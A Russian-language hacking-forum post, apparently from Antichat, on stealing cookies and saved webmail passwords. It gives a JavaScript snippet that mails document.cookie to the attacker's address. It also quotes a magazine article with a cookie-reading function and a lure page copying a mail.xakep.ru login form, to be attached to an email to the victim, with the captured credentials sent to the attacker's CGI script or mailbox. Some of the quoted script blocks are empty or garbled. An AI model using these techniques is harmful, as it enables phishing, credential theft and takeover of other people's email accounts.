Форум АНТИЧАТ - Крадем cookies

Ява скрипт в этом случае не подходит

var cook=show_all_cookies();
document.open("cookies",cook);
document.write('<form
onsubmit="javascript:window.close();"
method=post action="mailto:твое_мыло@mail.ru&quot ;
ENCTYPE="text/plain"><+'?'+document.cookie;><in put type=submit
value="Нажмите что бы
закрыть"></form>')
</script>
Этот скрипт ничего тебе не пришлет. сам понимаешь почему... я тут на хакере вот что нашел:
<span style='color:green'>Ты когда-нибудь задумывался о безопасности почты на основе WWW-Интерфейса? Скорее всего нет. А если и да, то скорее всего на масли тебя натолкнул какой-нибудь журналист, сказавший что хакеры (а по его словам это гении компьютерного мира, и вообще при одном их виде надо падать и бояться :]) взломали xxxmail.xxx. Но ты не обратил на это сообщение особого внимания, а зря.

По статистике большинство юзверей, которые пользуются мылом через свои любимые браузеры, очень ленивы и рано или поздно им надоедает вводить пасс и логин. Для таких людей создатели почт предлагают использовать всякие фишки по автоматическому заполнению паролей и логинов. Возникает интересный вопрос: как сервер узнаёт кто пришел и чем заполнить форму? В большинстве случаев ответ - Java+Cookies, так как эта технология поддерживается большинством браузеров (таких как Internet Explorer, Opera, Нетшкаф and so on ...).

Возникает проблема: как достать эти кукисы? Это сделать ОЧЕНЬ просто :). (намного сложнее заставить юзера посмотреть attachment :[ ). Давай рассмотрим это на примере какой-либо службы... Да чего долго ходить можно посмотреть и на mail.xakep.ru :). Зарегистрировавшись, получаем "ясчик" (и обращаем внимание на radio-button (переключатель) с надписью "Свой компьютер(запомнить имя и пароль)"). Ну что? Пусть запомнит пасс и логин (допустим, что мы часто здесь бываем и оооооочень ленивы). При последующей загрузке страницы мы видим введенные данные и нам остаётся только входить и радоваться жизни. Интересен код страницы аутентификации. Этот кусок отвечает за то самое сохранение пасса:

< script LANGUAGE="JavaScript">

</SCRIPT>

Значит cookie :). На этой же паге видим как их достать:

--------------------------
function getCookie(Name) {
var search = Name + "="
if (document.cookie.length > 0) { // if there are any cookies
offset = document.cookie.indexOf(search)
if (offset != -1) { // if cookie exists
offset += search.length // set index of beginning of value
end = document.cookie.indexOf(";", offset) // set index of end of cookie value
if (end == -1) end = document.cookie.length
return unescape(document.cookie.substring(offset, end))
}
}
}
--------------------------

< script LANGUAGE="JavaScript">

</SCRIPT>

Так. Пасс и логин теперь есть у сайта. Чем мы хуже? Делаем письмо человеку, пасс которого нам нужен, и перекрепляем к нему пагу, содержащую наш пас-зиф. Код этой паги может быть изменённым сорсом этой заготовки (в первом поле ввода логи во втором пасс):

<html>

< script LANGUAGE="JavaScript">

</SCRIPT>
<br>
<table width="100%" border=0 cellpadding=0 cellspacing=0>
<tr valign="top" align="center">
<td width="100%">
<p></p>
<table cellpadding=1 cellspacing=0 border=0>
<form method="post" name="logon" action="http://mail.xakep.ru/cgi-bin/mail" onSubmit="Save();">
<tr>
<td class=text><input type="text" name="username" size="8" style="width: 95px;"><input type="hidden" name="domain" value="xakep.ru"></td>
<td class=text><input type="text" name="password" size="8" style="width: 95px;"></td>
</tr>
</form>
</table>
</td>
</tr>
</table>

< script LANGUAGE="JavaScript">

</SCRIPT>

</td>
</tr>
</table>
</HTML>

Далее же всё зависит от твой фантазии. Можно где-нибудь в сети выложить свою CGI, которая будет принимать и "обрабатывать" логин и пасс жертвы, а можно, набравшись наглости, отправить от жертвы себе на мыло письмо с "бесценной информацией". В общем как с тем журналом - "Делай с ним, что хочешь".</span>
Удачи